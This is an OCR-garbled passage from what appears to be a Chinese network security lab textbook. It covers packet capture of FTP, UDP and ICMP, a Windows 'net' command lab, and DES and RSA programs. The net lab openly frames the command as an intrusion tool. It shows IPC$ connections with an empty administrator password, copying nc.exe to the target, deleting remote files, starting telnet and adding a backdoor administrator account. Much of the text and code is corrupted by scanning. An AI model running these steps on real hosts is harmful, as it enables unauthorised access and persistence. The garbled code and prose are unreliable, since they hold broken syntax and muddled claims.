Ah FTP 站 点 ?选项 ,服务 器 的 IP 地址 为 192. 168. 2. 2, 所 以 在 “默认 FTP 站 ”属性 对 
话 框 中 将 IP 地 址 选择 为 192. 168. 2. 2, 如 图 9-26 所 示 。 

(2) 在 客户 机 上 连接 服务 器 的 FTP 服务 : 在 客户 机 上 启动 Sniffer( 参 照 实 验 一 Sniffer 
设置 ) ,然后 在 DOS 命令 下 使 用 FTP 指令 连接 服务 器 的 FTP 服务 器 ,如 图 9-27 所 示 。 

默认 情况 下 ,FTP 服务 器 支持 匿名 访问 ,输入 的 用 户 名 是 ftp, 密 码 是 ftp。 退 出 对 方 的 
FTP 使 用 的 命令 是 bye。 停 止 Sniffer, 查 看 抓 取 的 FTP 会 话 过 程 , 如 图 9-28 所 示 。 
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的 人 查看 0 |+ + mma? 


图 9-25 开启 FTP 服务 


ERU FTP Aiai MEE aixi 
m 站 点 | 安全 帐号 | 消息 | 主 目录 | 目录 安全 性 | 

标识 
RAY 认 rr 站 点 
1r 地址 加) -— 村 
manO irr — 
连接 
C XPRoD 
c meaw [ 100,000 iS% 
emmo oe 


F 启用 日 志 记 录 @E) 
Ludis zi] 


sc 扩充 日 志文 们 格式 可 mem 
ELI 


[me ] xs | sfw | ww | 


9-26 选择 IP 地 址 


INDOYS\systea32\cad. 


icrosoft Windows XP [ 
kc» hRIXPTÉ 1985-2001 Microsoft Corp. 


:NDocuments and Settings Mdministrator?ftp 192.168.2.2 

onnected to 192.168.2.2. 

28 adserver Microsoft FTP Service (Version 5.85. 
©192.168.2.2:Cnone)): ftp 

31 Anonymous access allowed, send identity (e-mail name) as password. 

Password: 


38 Anonymous user logged in. 


1: NDocuments and Settings Administrator) 
图 9-27 连接 服务 器 的 FTP 服务 


G) 观察 抓 取 到 的 TCP 的 三 次 握手 和 四 次 挥手 的 过 程 。 握 手 过 程 如 图 9-29 一 图 9-31 
所 示 。 
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图 9-28 捕捉 FTP 的 会 话 过 程 


图 9-29 第 一 次 握手 


二 次 握手 


图 9-30 第 
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TCP 

TCP. Source port * 1035 

TCP. Destination port a 21 (FTP-ctrl) 
TCP. = 301269383 

TCP: Next expected Seq number- 30126983 

TCP: Acknovledgment number = 244623437 

TCP. Data offset * 20 bytes 

TCP. Reserved Bits Reserved for Future Use (Not shown in the Hex Dump) 
TCP: Flags * 10 

TCP 0 * (No urgent pointer) 
TCP: 1 * àcknovledgaent 
TCP 0 = (No push) 

TCR 0 . = (No reset) 

TCP: 0. * (No SYN) 

TCP 0 = (No FIN) 

TCP: Vindov = 17520 

TCP: Checksus * 91BB (correct) 

TCP- Urgent pointer -0 

TCP: No TCP options 

TCP 


9-31 第 三 次 握手 


第 一 次 握手 : 由 客户 机 的 应 用 层 进程 向 其 传输 层 TCP 协议 发 出 建立 连接 的 命令 , 则 客 
户 机 TCP 向 服务 器 上 提供 某 特定 服务 的 端口 发 送 一 个 请 求 建立 连接 的 报 文 段 ,该 报 文 段 中 
SYN 被 置 1, 同 时 包含 一 个 初始 序列 号 z( 系 统 保持 着 一 个 随时 间 变 化 的 计数 器 ,建立 连接 
时 该 计数 器 的 值 即 为 初始 序列 号 ,因此 不 同 的 连接 初始 序列 号 不 同 ) 。 

第 二 次 握手 : 服务 器 收 到 建立 连接 的 请 求 报 文 段 后 ,发 送 一 个 包含 服务 器 初始 序号 y， 
SYN 被 置 1 ,确认 号 置 为 z 十 1 的 报 文 段 作为 应 答 。 确 认 号 加 1 是 为 了 说 明 服务 器 已 正确 收 
到 一 个 客户 连接 请 求 报 文 段 , 因 此 从 逻辑 上 来 说 ,一 个 连接 请 求 占 用 了 一 个 序号 。 

第 三 次 握手 : 客户 机 收 到 服务 器 的 应 答 报 文 段 后 ,也 必须 向 服务 器 发 送 确认 号 为 y 十 1 
的 报 文 段 进行 确认 。 同 时 客户 机 的 TCP 协议 层 通知 应 用 层 进 程 , 连 接 已 建立 ,可 以 进行 数 
据 传 输 了 。 

完成 三 次 握手 ,客户 端 与 服务 器 开始 传送 数据 。 

四 次 挥手 的 过 程 如 图 9-32 一 图 9-35 所 示 。 

第 一 次 挥手 : 由 客户 机 的 应 用 进程 向 其 TCP 协议 层 发 出 终止 连接 的 命令 , 则 客户 TCP 
协议 层 向 服务 器 TCP 协议 层 发 送 一 个 FIN 被 置 1 的 关闭 连接 的 TCP 报 文 段 。 

第 二 次 挥手 : 服务 器 的 TCP 协议 层 收 到 关闭 连接 的 报 文 段 后 ,就 发 出 确认 ,确认 序号 
为 已 收 到 的 最 后 一 个 字 节 的 序列 号 加 1, 同 时 把 关闭 的 连接 通知 其 应 用 进程 ,告诉 它 客 户 机 
已 经 终止 了 数据 传送 。 在 发 送 完 确认 后 ,服务 器 如 果 有 数据 要 发 送 , 则 客户 机 仍然 可 以 继续 
接收 数据 ,因此 把 这 种 状态 叫 半 关闭 (Half-close) 状 态 ,因为 服务 器 仍然 可 以 发 送 数据 ,并 且 
可 以 收 到 客户 机 的 确认 ,只 是 客户 方 已 无 数据 发 向 服务 器 了 。 

第 三 次 挥手 : 如 果 服 务 器 应 用 进程 也 没有 要 发 送 给 客户 方 的 数据 了 ,就 通知 其 TCP 协 
议 层 关闭 连接 。 这 时 服务 器 的 TCP 协议 层 向 客户 机 的 TCP 协议 层 发 送 一 个 FIN 置 1 的 报 
文 段 ,要 求 关闭 连接 。 
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didddddddddddddddddg 


Source port 

Destination port 
Sequence number 
Next expected Seq nunber= 244623596 


Acknovledgment number 
Data offset 

Reserved Bits. Reserved 
Flags 


Vindow 
Checksum 
Urgent pointer 
No TCP options 


= 21 (FTP-ctr1) 
= 1035 
= 244623595 


* 30127006 

* 20 bytes 

for Future Use (Not shovn in the Hex Dump) 
«e.a 

(No urgent pointer) 

* kcknowledgment 
* (No push) 

* (No reset) 

* (No SYN) 

* FIN 


17497 
911C (correct) 
0 


图 9-32 第 一 次 挥手 


TCP 
TCP 
TCP 
TCP 
TCP 
TCP 
T^» 


Source port * 1035 
Destinstion port a 21 (FTP-ctrl) 
Sequence nuaber = 30127006 
Next expected Seq nuaber= 30127006 
Ácknovledgment nunber = 244623596 
Data offset * 20 bytes 
Reserved Bits: Reserved for Future Use (Not shovn in the Hex Dump) 
Flags - 10 
0 * (Nc urgent pointer) 
1 * Acknovledgwent 
0 * (Nc push) 
0 * (Nc reset) 
0. = (No SYN) 
0 = (No FIN) 
Vindov * 17362 
Checksun = 9143 (correct) 
Urgent pointer -0 


No TCP opticns 


图 9-33 第 二 次 挥手 


Source port 

Destination port 
Sequence number 
Next expected Seq number* 


Acknovledgment number 


Data offset 
Reserved Bits: Reserved 
Flags 
0 
1 
0 
0 
0 
1 
Vindov 
Checksum 


Urgent pointer 
No TCP options 


* 1035 

. 21 (FTP-ctz1) 

* 30127006 

30127007 

~ 244623596 

* 20 bytes 

for Future Use (Not shown in the Hex Dump) 
-11 

* (No urgent pointer) 

= hcknovledgnent 

* (No push) 

* (No reset) 

* (No SYN) 

- FIN 

» 17362 

* 9142 (correct) 
-0 


图 9-34 第 三 次 挥手 
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T 
T 
T 
TCP: Urgent pointer * 0 
TCP: No TCP options 


图 9-35 第 四 次 挥手 


第 四 次 挥手 : 同样 ,客户 机 收 到 关闭 连接 的 报 文 段 后 ,向 服务 器 发 送 一 个 确认 ,确认 序 
号 为 已 收 到 数据 的 序列 号 加 1。 当 服务 器 收 到 确认 后 ,整个 连接 被 完全 关闭 。 

思考 题 : 

1. 抓 取 FTP 的 数据 报 , 并 分 析 TCP 的 头 结构 .分 析 TCP 的 “三 次 握手 ”和 “四 次 挥手 ” 
的 过 程 。 

2. 建立 FTP 的 服务 器 ,指定 新 建 主 目录 ,并 上 传 和 下 载 文 件 。 


实验 四 HR UDP 协议 的 头 结构 


1. 实验 目的 
利用 DNS 抓 取 UDP 协议 的 头 结构 ,比较 UDP 和 TCP 的 不 同 点 。 


2. 实验 所 需 软件 

客户 机 操作 系统 : Windows 2000 /Windows XP,IP 地 址 为 192. 168. 2. 1. 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP,IP 地 址 为 192. 168. 2. 2 。 

抓 包 软件 Sniffer 4. 7. 5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server /Windows XP, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


3. 实验 步骤 

(1) 首先 为 客户 机 设置 DNS 服务 地 址 ,我们 将 客户 机 的 DNS 服务 地 址 设 为 192. 168. 2. 2 
即 客户 机 的 DNS 服务 地 址 指向 服务 器 ,如 图 9-36 所 示 。 

(2) 然后 启动 Sniffer( 参 照 实验 一 Sniffer 设置 ) ,已 知 访问 DNS 就 可 以 抓 到 UDP 数据 
报 ,所 以 在 启动 抓 包 后 ,在 主机 的 DOS 界面 下 输入 命令 nslookup. Wh E 9-37 所 示 。 或 者 浏 
览 一 个 网 页 也 可 以 ,只 要 应 用 了 DNS, 就 可 以 抓 到 UDP 的 报头 。 

G) 查看 Sniffer 抓 取 的 数据 包 , 可 以 看 到 UDP 报头 ,如 图 9-38 所 示 。 
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9-37 使 用 UDP 协议 连接 计算 机 


Snifl: Decode, 1/3 Unknown Frases 


[]No [Status |SouceAdden DedAdbes nS EA Te jDetaTme Ab Tero 
1 M 197 168 > 1 192 169.2 2 m DIETUIHENIUEUHE D 00.00 000i 0.000 000: 20 
2 [192.168.2.2] [192.168.2.1] R ID*i rvar failure WAMISA — 0.00.17.761 17.761.624 201 

mil [192,168 2.1] |[192 168 2 2] 112. 0:00:17.762 0.000.635 — 20] 


æptable 


Additional rec 


Sir AUN R 


Name + 2? 2 168 


* Internet 


图 9-38 得 到 UDP 数据 报 
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可 以 看 出 UDP 的 头 结构 比较 简单 ,UDP 提供 的 是 非 连接 的 数据 报 服务 ,意味 着 UDP 
无 法 保证 任何 数据 报 的 传递 和 验证 ,UDP 和 TCP 的 传递 数据 的 比较 如 表 9-1 所 示 。 
表 9-1 UDP 和 TCP 的 传递 数据 的 比较 


UDP 协议 TCP 协议 
无 连接 的 服务 ; 在 主机 之 间 不 建立 会 话 面向 连接 的 服务 ; 在 主机 之 间 建 立会 话 
UDP 不 能 确保 或 承认 数据 传递 或 序列 化 数据 TCP 通过 确认 和 按 顺序 传递 数据 来 确保 数据 的 
传递 


使 用 UDP 的 程序 负责 提供 传输 数据 所 需 的 可 靠 性 | 使 用 TCP 的 程序 能 确保 可 靠 的 数据 传输 

UDP 快速 ,开销 要 求 低 ,并 支持 点 对 点 和 一 点 对 多 | TCP 比较 慢 , 有 更 高 的 开销 要 求 , 而 且 只 支持 点 对 
点 的 通信 点 通信 

UDP 和 TCP 都 使 用 端口 标识 每 个 TCP/IP 程序 的 通信 


思考 题 : 
1. 分 析 UDP 协议 的 头 结 构 。 如 源 端口 .目的 端口 等 。 
2. 比较 UDP 协议 和 TCP 协议 。 


实验 五 ” 抓 取 ICMP 头 结构 


1. 实验 目的 
用 命令 ping 某 个 网 站 不 通 后 , 抓 ICMP 头 结构 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 192. 168. 2. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server / Windows XP.IP 地 址 为 192. 168. 2. 2。 
抓 包 软 件 Sniffer4. 7. 5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 


Internet Wig (TCP/IP) 展 性 


机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 ['x& savs 
Advance Server /Windows XP, 也 可 以 把 客户 Epam TUER GANG GE. EM. 
机 和 服务 器 同时 安装 到 虚拟 机 下 。 


OG BERERE TF WE QU 


3. 实验 步骤 O SAT r ib CO 
(1) 首先 把 主机 的 IP 地 址 设置 为 自动 获 
取 , 如 图 9-39 所 示 。 
(2) 然后 启动 Sniffer, 并 将 Define Filter 对 
话 框 中 Address 选项 卡 中 的 Station 1 和 Station 
2 中 的 IP 地 址 改 为 Any, 选 择 抓 包 的 类 型 为 IP( 其 他 设置 参照 实验 一 ) ,如 图 9-40 所 示 。 
(3) 启动 开始 抓 包 后 ,我 们 在 DOS 界面 下 ping 一 个 主流 网 站 如 百度 ,新 浪 等 。 我 们 会 
看 到 请 求 超时 的 回复 .如 图 9-41 所 示 。 
(4) 停止 并 显示 在 Sniffer 中 抓 到 的 ICMP 的 头 结构 ,如 图 9-42 所 示 。 


图 9-39 修改 主机 IP 地 址 


Sommary Adáress | Date Pattern | Advanced | Buffer Settings For 


了 wm Address: Oragable) 


/Waltiesst Address 
eok 


[ Station 1 Du. | Station? ^ 
cm 3j 8j any 

2 s-s 

kj s-s 

[n 2-2 

i1 2-5 

加 2-5 . 


图 9-40 设置 抓 包 的 类 型 和 地 址 


C: WINDOWS syst en32Vend. ex: 
XP [版 本 5.1 
2001 Micros 


d SettingsMAdministrator)ping www.baidu.co 


www. a-shifen.con ) vith 32 bytes of data 


tined out 


statistics for 119 18 


Packets: Sent = 4, Received = Ø, Lost = 4 (108x loss), 


d Settings Administrator), 


9-41 执行 ping 命令 
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图 9-42 显示 数据 包 的 传递 过 程 


思考 题 : 
1. 分 析 ICMP 数据 报 , 指 出 Type—8 与 Code—0 和 Type—0 与 Code— 0 的 区 别 。 
2. 指出 Ping, DNS, FTP 分 别 使 用 什么 协议 ? 
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1. 实验 目的 

net 命令 是 网 络 命令 中 最 重要 的 一 个 ,必须 透彻 掌握 它 的 每 一 个 子 命令 的 用 法 , 它 的 功 
能 很 强大 , 它 是 微软 为 我 们 提供 的 最 好 的 入 侵 工具 。 

2. 实验 所 需 软 件 

客户 机 操作 系统 : Windows 2000 /Windows XP.IP 地 址 为 192. 168. 1.1。 

ea Windows 2000 Advance Server /Windows XP,IP 地 址 为 192. 168. 1. 2。 

验 时 ,如果 没有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 

ii. Server /Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

1) net view 命令 查看 远程 主机 的 共享 资 

COD 客户 机 和 服务 器 的 IP 地 址 如 上 设置 

(2) 在 客户 机 上 的 DOS 界面 下 输入 net view \\192. 168. 1. 2, 如 图 9-43 所 示 ,查看 服 

务 器 的 共享 文件 和 文件 夹 


源 


** C: WINDOWS systen32 cad. exe 


t Corp. 


dmninistrator?net view 4 


zNDocuments and Settings Administrator» 


图 9-43 net view 显示 共享 资源 


2) net use 把 远程 主机 的 某 个 共享 资源 映射 为 本 地 盘 符 

在 客户 机 上 的 DOS 界面 下 输入 命令 net use z: \\192. 168. 1. 2\malimei, 如 图 9-44 所 
示 , 把 192. 168. 1.2 下 的 共享 名 为 malimei 的 目录 映射 为 本 地 的 Z 盘 ,显示 Z 的 内 容 。 

3) 与 远程 计算 机 建立 信任 连接 

命令 格式 为 net use \\IP\IPC$ password /user: name 

CD 在 客户 机 上 的 DOS 界面 下 输入 net use \\192. 168. 1. 2\IPC $ /user: administrator. 
如 图 9-45 所 示 ,表示 与 192. 168. 1. 2 建立 信任 连接 ,密码 为 空 ,用户 名 为 administrators Œ 
立 了 IPC$ 连 接 后 ,就 可 以 上 传 文件 了 。 

(2) 输入 copy nc. exe \\192. 168. 1. 2Nipc$ ,如 图 9-46 所 示 ,表示 把 本 地 目录 下 的 nc. exe 
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and Settings Vidministrator?net use z: 


*5192.168.1.2*malimei 


8016-81-28 
2016-81-28 
0914-81-21 
2014-02-11 
2914-02-18 
2014-02-11 


<DIR> 
<DIR> S 
5,586,298 kerio-urs-5.8.0-rc4-vin.exe 
58,368 GetNTÜser.exe 
5,339,988 xs.rtf 
70 dict .txt 
18,984,716 字 节 


图 9-44 


net use 共享 资源 映射 为 本 地 盘 符 


5192.168.1.2*ipc$ /user:administrator 


use \\92.168.1.2\ipc$ /user 


:adninistrator 


\\92.168.1.2\ipc$ 
IPC 

OK 

L] 

1 


Æ 9-45 net use 建立 信任 连接 

传 到 远程 服务 bebe spit 区 务 器 的 文件 复制 到 客户 端 ,命令 为 copy NN 192. 168. 1. 2Xc $N 
文件 名 c:\ ,表示 把 远 端 服务 器 的 某 个 文件 复制 到 客户 端的 C 盘 根 目录 下 ,结合 后 面 要 介绍 
到 的 其 他 DOS 命令 就 可 以 实现 人 侵 了 

(3) 删除 远 端 服务 器 上 的 文件 ,如 del \\192. 168. 1. 2\c $ \al. txt, Ez C 盘 上 的 
al. txt 文件 

1) net start 和 net stop 命令 启动 ,关闭 远程 主机 上 的 服务 

在 DOS 命令 下 输入 net start telnet, 回 i 就 成 功 启 动 了 telnet 服务 ,如 图 9-47 所 示 。 

如 果 在 以 后 又 发 现 远 程 主机 的 某 个 服务 不 需要 了 ,利用 net stop 命令 停 掉 就 可 以 了 ,用 
法 和 net start 相同 


5) net localgroup 查看 所 有 和 用 户 组 有 关 的 信息 并 进行 相 作 


首先 用 上 面 的 方法 建立 一 个 用 户 , 名 字 为 malimei, 密 码 是 
34 /add。 
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入 net user malimei 
然后 输入 net localgroup administrators malimei 
Administrators 超级 用 户 组 。 


最 后 输入 net user malimei 查看 用 户 的 状态 ,如 图 9-48 所 示 


即 在 DOS 界 


add 把 malimei Jj P JI 
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D4B3-DHBE 


NDocunents and Settings Adninist 


91-26 «DIR» 
91-2 


91-26 


34,919,043, 072 


Settings Midninistrator?copy nc.exe \\192.168.1. 


Settin 


1MDocuments and Settings Adninistrator), 


9-47 ”启动 telnet BR 


net localgroup administrators malimei /add 
成 功 完成 


r nalimei 
nmalinei 


201671728 上 午 
2816/3711 上 午 


2016/71/28 上 午 
Yes 
Yes 


*fidninistrators 
“None 


m 


9-48 ”把 普通 用 户 加 入 到 超级 用 户 组 
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6) net time 查看 远程 服务 器 当前 的 时 间 
用 法 : net time \\192. 168. 1.2, 如 图 9-49 所 示 。 


MWINDOWSV syst en32Vcad. 


and Settings Vidninist 
ĝ A Li 


^:NDocuments and Settings Adninistrator 


图 9-49 显示 远程 服务 器 的 时 间 
思考 题 : 
1. 练习 使 用 net 命令 建立 信任 连接 ,并 复制 文件 。 
2. 用 net 命令 建立 用 户 ,并 把 用 户 加 到 管理 员 组 中 。 


KE DES 算法 的 程序 实现 


1. 实验 目的 

根据 DES 算法 的 原理 ,可 以 方便 地 利用 C 语言 
VC++ 6.0 环境 下 测试 通过 。 

2. 实验 所 需 软件 

在 VC++ 6.0 中 新 建 基于 控制 台 的 Win32 应 用 程序 。 

3. 实验 步骤 


: 现 其 加 密 和 解密 算法 。 程 序 在 


# include "memory. h" 

# include "stdio. h" 

enum {ENCRYPT, DECRYPT} ; // ENCRYPT: Ji & , DECRYPT : fj à; 
void Des Run(char Out[8], char In[8], bool Type = ENCRYPT) ; 

// 设置 密 钥 


void Des SetKey(const char Key[8]); 


static void F func(bool In[32], const bool Ki[48]); // £ 函数 
static void S func(bool Out[32], const bool In[48]); // S ERRE 
// 变换 


static void Transform(bool * Out, bool * In, const char * Table, int len); 
static void Xor(bool * InA, const bool * InB, int len);  // 异 或 
static void RotateL(bool * In, int len, int loop); // 循环 左 移 
// 字 节 组 转换 成 位 组 
static void ByteToBit(bool x Out, const char * In, int bits); 
// 位 组 转换 成 字 节 组 
static void BitToByte(char * Out, const bool * In, int bits); 
// 置 换 IP dé 
const static char IP Table[64] = { 

58,50, 42,34, 26,18,10,2,60,52,44,36,28,20,12,4, 

62,54, 46,38,30, 22, 14,6, 64,56,48, 40,32, 24,16,8, 
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57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3, 
61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7 
}; 
// 逆 置换 IP-1 表 
const static char IPR Table[64] = { 
40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31, 
38,6,46,14,54,22,62,30,37,5,45,13,53,21,61,29, 
36,4,44,12,52,20,60, 28, 35, 3, 43,11, 51,19,59,27, 
34,2,42,10,50,18,58,26,33,1,41,9,49,17,57,25 
}; 
//E 位 选择 表 
static const char E Table[48] = { 
32,1,2,3,4,5,4,5,6,7,8,9, 
8,9,10,11,12,13, 12, 13,14, 15,16, 17, 
16,17,18,19, 20, 21, 20, 21,22, 23, 24,25, 
24,25,26,271,28,29,28,29,30,31,32,1 
}; 
//P 换 位 表 
const static char P Table[32] = ( 
16,7,20, 21,29, 12, 28,17, 1,15, 23,26, 5, 18,31, 10, 
2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25 
}; 
//PCÀ 选 位 表 
const static char PC1 Table[56] = ( 
57,49,41,33,25,17,9,1,58,50,42,34,26,18, 
10,2,59,51,43,35,27,19,11,3,60,52,44,36, 
63,55,47,39,31,23,15,7,62,54, 46,38, 30,22, 
14,6,61,53,45,37,29,21,13,5,28,20,12,4 
}; 
//PC2 选 位 表 
const static char PC2 Table[48] = { 
14,17,11,24, 1, 5,3,28,15,6, 21,10, 
23,19,12,4,26,8, 16,7, 27,20,13,2, 
41,52,31,37,47,55,30,40,51,45,33,48, 
44,49, 39,56, 34, 53, 46, 42,50, 36, 29, 32 
}; 
// 左 移 位 数 表 
const static char LOOP Table[16] = ( 
1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,T 
}; 
I SÈ 
const static char S_Box[8][4][16] = { 
//8 
14,4,13,1,2,15,11,8,3,10,6,12,5,9,0, 7, 
0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8, 
4,1,14,8,13,6, 2, 11, 15, 12, 9,7, 3, 10, 5,0; 
15,12,8,2,4,9,1,7,5,11,3, 14, 10,0,6, 13, 
//s2 
15,1,8,14,6,11,3,4,9, 7, 2, 13,12, 0,5, 10, 
3,13,4,7,15,2,8,14,12,0,1,10,6,9, 11,5, 
0,14,7,11,10,4,13,1,5,8,12,6,9,3,2,15, 
13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9, 
//S3 
10,0,9,14,6,3,15,5,1,13,12, 7,11,4,2,8, 
13,7,0,9,3,4,6,10,2,8,5,14,12,11,15,1, 
13,6,4,9,8,15,3,0,11,1,2,12,5,10,14, 7, 
1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12, 
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//S4 
7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15, 
13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9, 
10,6,9,0,12,11, 7,13, 15, 1, 3,14,5,2,8,4, 
3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14, 
//85 
2,12,4,1,7,10,11,6,8,5,3,15, 13, 0,14,9, 
14,11,2,12,4,7,13,1,5,0, 15, 10,3,9,8,6, 
4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14, 
11,8,12,7,1,14,2,13, 6, 15,0,9,10,4,5,3, 
//S6 
12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11, 
10, 15,4,2,7,12,9,5,6,1, 13, 14, 0, 11, 3,8, 
9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6, 
4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13, 
//S7 
4,11,2,14,15, 0,8,13,3,12,9,7,5,10,6,1, 
13,0,11,7,4,9,1,10, 14,3, 5,12, 2,15,8,6, 
1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2, 
6,11,13,8,1,4,10,7,9, 5,0, 15,14, 2, 3,12, 
//S8 
13,2,8,4,6,15,11,1,10,9,3, 14,5,0,12,7, 
1,15,13,8,10,3,7,4,12,5,6, 11,0,14,9,2, 
7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8, 
2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11 
h 
static bool SubKey[16][48]; // 16 圈子 密 钥 
void Des_Run(char Out[8], char In[8], bool Type) 
{ 
static bool M[64], Tmp[32], *Li = &M[0], «Ri = &M[32]; 
ByteToBit(M, In, 64); 
Transform(M, M, IP Table, 64); 
if( Type == ENCRYPT ){ 
for(int i=0; i<16; i++) ( 
memcpy(Tmp, Ri, 32); 
F_func(Ri, SubKey[i]); 
Xor(Ri, Li, 32); 
memcpy(Li, Tmp, 32); 
} 
Jeise( 
for(int i=15; i»-0; i--)( 
memcpy(Tmp, Li, 32); 
F func(Li, SubKey[i]); 
Xor(Li, Ri, 32); 
memcpy(Ri, Tmp, 32); 


) 
Transform(M, M, IPR Table, 64); 
BitToByte(Out, M, 64); 
) 
void Des SetKey(const char Key[8]) 
{ 
static bool K[64], «KL = &K[0], * KR = &K[28]; 
ByteToBit(K, Key, 64); 
Transform(K, K, PC1 Table, 56); 
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for(int i=0; i«16; i++) { 
RotateL(KL, 28, LOOP Table[i]); 
RotateL(KR, 28, LOOP Table[i]); 
Transform(SubKey[i], K, PC2_Table, 48); 


} 
} 
void F_func(bool In[32], const bool Ki[48]) 
{ 
static bool MR[48]; 
Transform(MR, In, E Table, 48); 
Xor(MR, Ki, 48); 
S func(In, MR); 
Transform(In, In, P Table, 32); 
} 
void S func(bool Out[32], const bool In[48]) 
{ 


for(char i=0,j,k; i<8; i++, In+=6,0ut+=4) ( 
j (In[0]<<1) + In[5]; 
k = (In[1]««3) + (In[2]<<2) + (In[3]<<1) + In[4]; 
ByteToBit(Out, &S_Box[i][j][k], 4); 


" 


void Transform(bool * Out, bool * In, const char * Table, int len) 
static bool Tmp[256]; 
for(inti-0; i«len; i++) 
Tmp[i] = In[ Table[i]-1 ]; 
memcpy(Out, Tmp, len); 


void Xor(bool * InA, const bool * InB, int len) 


for(inti-0; i«len; i++) 
Ina[i] ^= InB[i]; 


void RotateL(bool x In, int len, int loop) 


static bool Tmp[256]; 
memcpy(Tmp, In, loop); 
memcpy(In, In + loop, len- loop); 
memcpy(In + len- loop, Tmp, loop); 
} 
void ByteToBit(bool * Out, const char * In, int bits) 


for(int i=0; i<bits; i++) 
Out[i] = (In[i/8]>>(i%8)) &1; 


void BitToByte(char * Out, const bool * In, int bits) 
menset(Out, 0, (bits + 7)/8); 


for(int i=0; i<bits; i++) 
Out[i/8] |= In[i]««(i*8); 


void main() 
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char key[8] = {1,9,8,0,9,1,7,2}, str[ ] = "test"; 
puts("Before encrypting"); 

puts(str); 

Des SetKey(key); 

Des Run(str, str, ENCRYPT); 

puts("After encrypting"); 

puts(str); 

puts("After decrypting"); 

Des Run(str, str, DECRYPT); 

puts(str); 


} 


4. 实验 结果 

设置 一 个 密 钥 为 数组 char key[8] 一 {1,9,8,0,9,1,7,2}, 要 加 密 的 字符 串 数组 是 str[]= 
"test" ,利用 Des_SetKey(key) 设 置 加 密 的 密 钥 ,调用 Des_Run(str，str，ENCRYPT) 对 输 
入 的 明文 进行 加 密 ,其 中 第 一 个 参数 str 是 输出 的 密 文 ,第 二 个 参数 str 是 输入 的 明文 , 枚 举 
ffi ENCRYPT 设置 进行 加 密 运 算 。 程 序 执行 的 结果 如 下 所 示 。 

Before encrypting 

test 

After encrypting 

T] :c«F (2 

After decryping 


test 
Press any key to continue 


思考 题 : 更 改 密 钥 和 要 加 密 的 字符 串 ,运用 DES 算法 实现 。 
实验 八 ”RSA 算法 的 程序 实现 


1. 实验 目的 

根据 RSA 算法 的 原理 ,可 以 利用 C 语言 实现 其 加 密 和 解密 算法 。RSA 算法 比 DES 算 
法 复杂 ,加 解密 的 所 需要 的 时 间 也 比较 长 。 

2. 实验 所 需 软 件 

VC++ 6.0, 

操作 系统 为 Windows XP 或 者 Windows Server。 

3. 实验 步骤 

利用 RSA 算法 对 文件 进行 加 密 和 人 解密。 算法 根据 设置 自动 产生 大 素数 p 和 9g, 并 根据 
p 和 g 的 值 产生 模 (n)、 公 钥 (e) 和 私 钥 (d), 利 用 VC++ 6.0 实现 核心 算法 ,如 图 9-50 所 示 。 

编译 执行 程序 ,如 图 9-51 所 示 。 该 对 话 框 提供 的 功能 是 对 未 加 密 的 文件 进行 加 密 , 并 
可 以 对 已 经 加 密 的 文件 进行 解密 。 
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图 9-50 算法 的 实现 


图 9-51 RSA 加 密 主 界面 
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在 图 9-51 中 点 击 按钮 “产生 RSA 密 钥 对 ”, 在 出 现 的 对 话 框 中 首先 产生 素数 p 和 素数 
gq， 如 果 产 生长 度 100 位 的 p 和 g ,大约 分 别 需要 10 秒 左 右 ,产生 的 素数 如 图 9-52 所 示 。 


Ea En Zn 


175C3C81EETF8BCO9FOGAA2EEAFAGEEEFBCBEO8BOTFCBAA19E656D51793FDECOBTCC | | 


D6DF52E34312115FF82291F5E36E094F755AC50926ED7715CF3210C85E98C69 | 


e 


[O m——————————————— 


A 9-52 产生 素数 p 和 g 
利用 素数 p Fl q 产生 密 钥 对 ,产生 的 结果 如 图 9-53 所 示 。 


E 


/328ET06AD 1 34AF991F9114BDGEE8E39228B2FF5019498207 1DÜFÜ1CTC TFb42AEFDC 


图 9-53 产生 密 钥 对 
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必须 将 生成 的 模 n、 公 钥 e 和 私 钥 a. 导出 ,并 保存 成 文件 ,加 密 和 解密 的 过 程 中 要 用 到 
这 三 个 文件 。 其 中 模 ”和 私 钥 4 用 来 加 密 n MAH e 用 来 解密 。 将 三 个 文件 分 别 保存 ， 
如 图 9-54 所 示 。 


公 钥 .txt 模 n.txt 私 钥 .txt 
图 9-54 三 个 加 密 文件 
在 主 界面 选择 一 个 文件 ,并 导入 “ 模 n. txt” 文 件 到 RSA* BE n" CAR HE | SE ACRAS. txt" 


文件 或 者 " 公 钥 . txt”, 加 密 如 果 用 “ 私 钥 . txt”, 那 么 解密 的 过 程 就 用 “ 公 钥 . txt”, 反 之 亦 然 ， 
加 密 过 程 如 图 9-55 所 示 。 加 密 完成 以 后 ,自动 产生 一 个 加 密 文件 ,如 图 9-56 所 示 。 


ITI 加 
sana 
MANH F: \ocments and Settings\Adainistrator \wait, tzt MEL 
Wubxe E: Docunents and Settings VAdnini st rator AME \vait. tet. ner ERER 
r emue anan 


| 


xs 
